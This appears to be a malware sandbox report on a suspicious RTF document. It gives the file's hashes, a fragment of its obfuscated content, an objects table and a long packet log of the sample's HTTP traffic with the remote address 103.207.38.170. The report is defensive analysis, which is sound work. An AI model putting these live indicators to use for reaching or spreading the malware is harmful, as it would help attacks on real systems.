                                                                                                                                                      SHA256:15655af972b632964f3327334c8809fb6cd6cd04e43f4548a32a5bb5743a75bc
                                                                                                                                                      SHA512:981c6e16ef59a337a1375367a048e63c877550137e01b7854356355c1f876c3118d606adeb33b0a047645b7eeb3806ed0a72aed5a36d7b7be4699ce23c5818ed
                                                                                                                                                      SSDEEP:192:txo49xa9Dj4BAQBR6qz0EW1qTGBGuJZzugM2U3Ucvm1Af++ldIbZ:txoX9DsBAQBR1zaqT0GumxQcuaW+ldK
                                                                                                                                                      File Content Preview:{\rtf4435#._).+2^.*'.9^1;.+%?+`(,~;00?/!1[6;?+<[.??)@)4(3?4(.?#81['4>88];`1'*.?/&%+)?];.+=^4..8%#3/6;[)$595#8]^$-[477,%??#2.:3??_?3.5?^$]=_#~$*3/'??#@?^$(?(._,?@!(]@,?.'.,6?<>_=%<;+7)[&<=2>3./?2!'.>%50)2773=%6)-.:$`+3~_#0,&0-2)?.)?,=%.>*^+0>?5<916?`9.?>:?

                                                                                                                                                      File Icon

                                                                                                                                                      Icon Hash:e4eea2aaa4b4b4a4

                                                                                                                                                      Static RTF Info

                                                                                                                                                      Objects

                                                                                                                                                      IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                                                                                                                      00000145Ehno

                                                                                                                                                      Network Behavior

                                                                                                                                                      Network Port Distribution

                                                                                                                                                      TCP Packets

                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                      Nov 20, 2020 20:04:32.537091970 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:32.756125927 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:32.756274939 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:32.756769896 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:32.975847960 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:32.975930929 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:32.975991964 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:32.976052046 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:32.976129055 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:32.976144075 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:32.976193905 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:32.976278067 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:32.976294041 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:32.976392984 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:32.976432085 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:32.976560116 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:32.976597071 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:32.976613998 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:32.976623058 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:32.976634026 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:32.976634026 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:32.976654053 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:32.977224112 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:32.984405041 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.195771933 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.195823908 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.195867062 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.195921898 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.195970058 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.195991039 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.196017981 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.196028948 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.196028948 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.196093082 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.196146011 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.196171045 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.196187973 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.196213007 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.196223021 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.196276903 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.196325064 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.196355104 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.196372032 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.196382046 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.196382046 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.196446896 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.196459055 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.196516037 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.196563005 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.196588993 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.196604967 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.196614981 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.196625948 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.196711063 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.196712971 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.196774960 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.196780920 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.196836948 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.196886063 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.196902037 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.196903944 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.196985960 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.197880983 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.414916992 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.414956093 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.414975882 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.414995909 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415016890 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415043116 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415071964 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415098906 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415124893 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415152073 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415178061 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415199995 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415225983 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415230989 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.415251970 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415265083 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.415277958 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415303946 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415323973 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415330887 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.415344954 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415358067 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.415365934 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415385962 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415404081 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415421009 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415437937 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415441990 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.415456057 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415457964 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.415474892 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415478945 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.415496111 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415515900 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415534973 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415549994 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.415551901 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415561914 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.415570974 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415577888 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.415589094 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415607929 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415607929 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.415626049 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415652037 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415652037 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.415673018 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415690899 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415704012 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.415724993 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.415734053 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.415957928 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415977955 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.415996075 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.416014910 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.416065931 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.416095018 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.417428970 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.633999109 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.634046078 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.634068012 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.634074926 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.634088993 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.634114981 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.634144068 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.634147882 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.634170055 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.634192944 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.634198904 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.634210110 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.634213924 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.634236097 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.634255886 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.634275913 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.634283066 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.634310961 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.634327888 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.634331942 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.634354115 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.634372950 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.634378910 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.634382963 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.634414911 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.634475946 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.635368109 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.636917114 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.636941910 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.636962891 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.636982918 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.636997938 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.637006044 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.637028933 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.637032032 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.637056112 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.637073040 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.637075901 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.637099028 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.637101889 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.637120008 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.637124062 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.637140989 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.637150049 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.637164116 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.637176037 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.637186050 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.637212038 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.637219906 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.637236118 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.637236118 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.637257099 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.637276888 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.637288094 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.637295008 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.637298107 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.637319088 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.637337923 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.637341022 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.637362957 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.637375116 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.637409925 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.637429953 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.637444973 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.637458086 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.637469053 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.637490988 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.637495995 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.637512922 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.637533903 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.637541056 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.637554884 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.637567997 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.637584925 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.637590885 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.637614012 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.637643099 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.637656927 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.637665987 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.637672901 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.637679100 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.637715101 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.638135910 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.852669001 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.852725029 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.852762938 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.852802992 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.852840900 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.852884054 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.852889061 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.852910042 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.852932930 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.852950096 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.852972984 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.853004932 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.853158951 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.853486061 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.853529930 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.853569984 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.853600979 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.853610992 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.853621006 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.853658915 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.853693962 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.853703976 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.853730917 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.853761911 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.853800058 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.853821993 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.853831053 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.853998899 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.855809927 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.855839968 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.855884075 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.855921030 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.855926991 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.855940104 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.855959892 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.855984926 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.856000900 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.856256008 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.856297970 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.856333971 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.856337070 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.856374979 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.856412888 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.856436014 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.856446028 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.856451035 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.856456041 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.856470108 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.856503963 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.856547117 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.856555939 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.856569052 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.856585026 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.856590986 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.856625080 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.856663942 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.856698036 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.856703043 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.856712103 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.856724024 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.856740952 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.856759071 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.856779099 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.856795073 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.856827974 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.856868029 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.856870890 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.856880903 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.856909037 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.856931925 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.856947899 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.856980085 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.856987000 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.857023954 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.857047081 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.857055902 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.857062101 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.857084036 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.857100964 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:33.857122898 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:33.857146978 CET4916580192.168.2.22103.207.38.170
